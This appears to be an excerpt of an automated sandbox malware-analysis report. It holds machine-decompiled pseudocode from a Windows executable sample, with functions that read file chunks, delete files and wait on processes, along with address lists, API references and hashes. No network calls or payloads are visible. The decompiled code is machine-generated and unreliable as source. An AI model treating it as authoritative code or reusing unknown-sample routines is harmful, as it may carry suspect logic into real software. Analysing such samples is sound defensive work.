                                                  0x00406df8
                                                  0x00406df8
                                                  0x00406dfc
                                                  0x00407569
                                                  0x00000000
                                                  0x00407569
                                                  0x00406e02
                                                  0x00406e05
                                                  0x00406e08
                                                  0x00406e0c
                                                  0x00406e0f
                                                  0x00406e15
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e1a
                                                  0x00406e1d
                                                  0x00406e1d
                                                  0x00406e20
                                                  0x00406e23
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e29
                                                  0x00406e2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e35
                                                  0x00406e35
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e3f
                                                  0x00406e42
                                                  0x00406e45
                                                  0x00406e46
                                                  0x00406e49
                                                  0x00406e4b
                                                  0x00406e51
                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e60
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e93
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406e9c
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00000000
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00000000
                                                  0x00407489
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073af
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407546
                                                  0x00407447
                                                  0x00000000
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407194
                                                  0x00407197
                                                  0x0040719a
                                                  0x0040719c
                                                  0x0040719e
                                                  0x0040719e
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a9
                                                  0x004071ac
                                                  0x004071ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00407490
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040749f
                                                  0x0040749f
                                                  0x004074a3
                                                  0x004075db
                                                  0x00000000
                                                  0x004075db
                                                  0x004074a9
                                                  0x004074ac
                                                  0x004074af
                                                  0x004074b3
                                                  0x004074b6
                                                  0x004074bc
                                                  0x004074be
                                                  0x004074be
                                                  0x004074be
                                                  0x004074c1
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c7
                                                  0x004074c7
                                                  0x004074cb
                                                  0x0040752b
                                                  0x0040752e
                                                  0x00407533
                                                  0x00407534
                                                  0x00407536
                                                  0x00407538
                                                  0x0040753b
                                                  0x00407447
                                                  0x00407447
                                                  0x00000000
                                                  0x0040744d
                                                  0x00407447
                                                  0x004074cd
                                                  0x004074d3
                                                  0x004074d6
                                                  0x004074d9
                                                  0x004074dc
                                                  0x004074df
                                                  0x004074e2
                                                  0x004074e5
                                                  0x004074e8
                                                  0x004074eb
                                                  0x004074ee
                                                  0x00407507
                                                  0x0040750a
                                                  0x0040750d
                                                  0x00407510
                                                  0x00407514
                                                  0x00407516
                                                  0x00407516
                                                  0x00407517
                                                  0x0040751a
                                                  0x004074f0
                                                  0x004074f0
                                                  0x004074f8
                                                  0x004074fd
                                                  0x004074ff
                                                  0x00407502
                                                  0x00407502
                                                  0x0040751d
                                                  0x00407524
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x004071c2
                                                  0x004071c5
                                                  0x004071fb
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732e
                                                  0x0040732e
                                                  0x00407331
                                                  0x00407333
                                                  0x004075bd
                                                  0x00000000
                                                  0x004075bd
                                                  0x00407339
                                                  0x0040733c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407342
                                                  0x00407346
                                                  0x00407349
                                                  0x00407349
                                                  0x00407349
                                                  0x00000000
                                                  0x00407349
                                                  0x004071c7
                                                  0x004071c9
                                                  0x004071cb
                                                  0x004071cd
                                                  0x004071d0
                                                  0x004071d1
                                                  0x004071d3
                                                  0x004071d5
                                                  0x004071d8
                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259
                                                  0x00000000
                                                  0x00407259
                                                  0x00407257
                                                  0x004071dd
                                                  0x004071e0
                                                  0x004071e2
                                                  0x004071e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f44
                                                  0x00406f44
                                                  0x00406f48
                                                  0x0040758d
                                                  0x00000000
                                                  0x0040758d
                                                  0x00406f4e
                                                  0x00406f51
                                                  0x00406f54
                                                  0x00406f57
                                                  0x00406f5a
                                                  0x00406f5d
                                                  0x00406f60
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f68
                                                  0x00406f6b
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00000000
                                                  0x00000000
                                                  0x004070cf
                                                  0x004070cf
                                                  0x004070d3
                                                  0x00407599
                                                  0x00000000
                                                  0x00407599
                                                  0x004070d9
                                                  0x004070dc
                                                  0x004070df
                                                  0x004070e2
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e7
                                                  0x004070ea
                                                  0x004070ed
                                                  0x004070f0
                                                  0x004070f3
                                                  0x004070f6
                                                  0x004070f7
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070fc
                                                  0x004070ff
                                                  0x00407102
                                                  0x00407105
                                                  0x00407105
                                                  0x00407105
                                                  0x00407108
                                                  0x0040710a
                                                  0x0040710a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040734c
                                                  0x0040734c
                                                  0x0040734c
                                                  0x00407350
                                                  0x00000000
                                                  0x00000000
                                                  0x00407356
                                                  0x00407359
                                                  0x0040735c
                                                  0x0040735f
                                                  0x00407361
                                                  0x00407361
                                                  0x00407361
                                                  0x00407364
                                                  0x00407367
                                                  0x0040736a
                                                  0x0040736d
                                                  0x00407370
                                                  0x00407373
                                                  0x00407374
                                                  0x00407376
                                                  0x00407376
                                                  0x00407376
                                                  0x00407379
                                                  0x0040737c
                                                  0x0040737f
                                                  0x00407382
                                                  0x00407385
                                                  0x00407389
                                                  0x0040738b
                                                  0x0040738e
                                                  0x00000000
                                                  0x00407390
                                                  0x0040710d
                                                  0x0040710d
                                                  0x00000000
                                                  0x0040710d
                                                  0x0040738e
                                                  0x004075c3
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bf2
                                                  0x004075fa
                                                  0x004075fa
                                                  0x00000000
                                                  0x004075fa
                                                  0x00407447
                                                  0x004073ce
                                                  0x004073cb

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                  • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                  • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                  • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403479 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				void* _t37;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t37 =  *0x40ce88 - 0x40cef0;
					if(_t37 == 0) {
						if( *0x40ce84 != 0 || _t31 == 0) {
							goto L20;
						} else {
							L16:
							_t16 =  *0x420ef4;
							if(_t16 -  *0x40ce60 + _a4 > 0) {
								continue;
							}
							SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
							goto L22;
						}
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					if( *0x40ce84 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}












                                                  0x00403489
                                                  0x0040349c
                                                  0x004034a1
                                                  0x004035d1
                                                  0x004035d3
                                                  0x00000000
                                                  0x004035d9
                                                  0x004034ad
                                                  0x004034c0
                                                  0x004034c6
                                                  0x004034cc
                                                  0x004034d7
                                                  0x004034dc
                                                  0x004034e1
                                                  0x004034e9
                                                  0x004034eb
                                                  0x004034eb
                                                  0x004034f4
                                                  0x004034fb
                                                  0x00000000
                                                  0x00000000
                                                  0x00403501
                                                  0x00403507
                                                  0x0040350d
                                                  0x00000000
                                                  0x00403513
                                                  0x00403519
                                                  0x00403539
                                                  0x0040353e
                                                  0x00403543
                                                  0x00403549
                                                  0x0040354f
                                                  0x00403559
                                                  0x00403560
                                                  0x00000000
                                                  0x00000000
                                                  0x00403568
                                                  0x0040356a
                                                  0x00403593
                                                  0x00000000
                                                  0x00403599
                                                  0x00403599
                                                  0x00403599
                                                  0x004035ac
                                                  0x00000000
                                                  0x00000000
                                                  0x004035bb
                                                  0x00000000
                                                  0x004035bb
                                                  0x00403593
                                                  0x00403574
                                                  0x0040357b
                                                  0x004035c8
                                                  0x004035ce
                                                  0x004035ce
                                                  0x00000000
                                                  0x004035ce
                                                  0x0040357d
                                                  0x00403589
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004035cc
                                                  0x004035cc
                                                  0x00000000
                                                  0x004035cc
                                                  0x00000000

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040348D
                                                    • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FilePointer$CountTick
                                                  • String ID:
                                                  • API String ID: 1092082344-0
                                                  • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                  • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                  • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                  • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 41%
                                                  			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                  0x00405d2d
                                                  0x00405d38
                                                  0x00405d3d
                                                  0x00405d6d
                                                  0x00000000
                                                  0x00405d6d
                                                  0x00405d44
                                                  0x00405d45
                                                  0x00405d4f
                                                  0x00405d47
                                                  0x00405d47
                                                  0x00405d47
                                                  0x00405d57
                                                  0x00405d63
                                                  0x00405d67
                                                  0x00405d67
                                                  0x00000000
                                                  0x00405d59
                                                  0x00000000
                                                  0x00405d5b

                                                  APIs
                                                    • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                    • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                                  • String ID:
                                                  • API String ID: 1655745494-0
                                                  • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                  • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                  • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                  • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                                  0x00406af1
                                                  0x00406b08
                                                  0x00406afc
                                                  0x00406b06
                                                  0x00406b06
                                                  0x00406b13
                                                  0x00406b1f

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                  • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CodeExitProcess
                                                  • String ID:
                                                  • API String ID: 2567322000-0
                                                  • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                  • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                  • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                  • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                                  0x00403375
                                                  0x0040337e
                                                  0x00403387
                                                  0x0040338b
                                                  0x00403396
                                                  0x00403396
                                                  0x0040339e
                                                  0x004033a5
                                                  0x004033b7
                                                  0x004033be
                                                  0x00403463
                                                  0x00403463
                                                  0x00000000
                                                  0x004033c4
                                                  0x004033c7
                                                  0x004033d3
                                                  0x004033d7
                                                  0x00403471
                                                  0x00403471
                                                  0x004033dd
                                                  0x004033e0
                                                  0x0040343f
                                                  0x00403445
                                                  0x00403447
                                                  0x00403447
                                                  0x00403459
                                                  0x00403461
                                                  0x00403468
                                                  0x0040346b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004033e2
                                                  0x004033e5
                                                  0x00000000
                                                  0x004033eb
                                                  0x004033f0
                                                  0x004033f7
                                                  0x004033fa
                                                  0x004033fc
                                                  0x004033fc
                                                  0x00403409
                                                  0x0040340c
                                                  0x00403413
                                                  0x00000000
                                                  0x00000000
                                                  0x0040341c
                                                  0x00403423
                                                  0x0040343b
                                                  0x00403465
                                                  0x00403465
                                                  0x00403425
                                                  0x00403425
                                                  0x00403428
                                                  0x0040342b
                                                  0x00403431
                                                  0x00403437
                                                  0x00000000
                                                  0x00403439
                                                  0x00000000
                                                  0x00403439
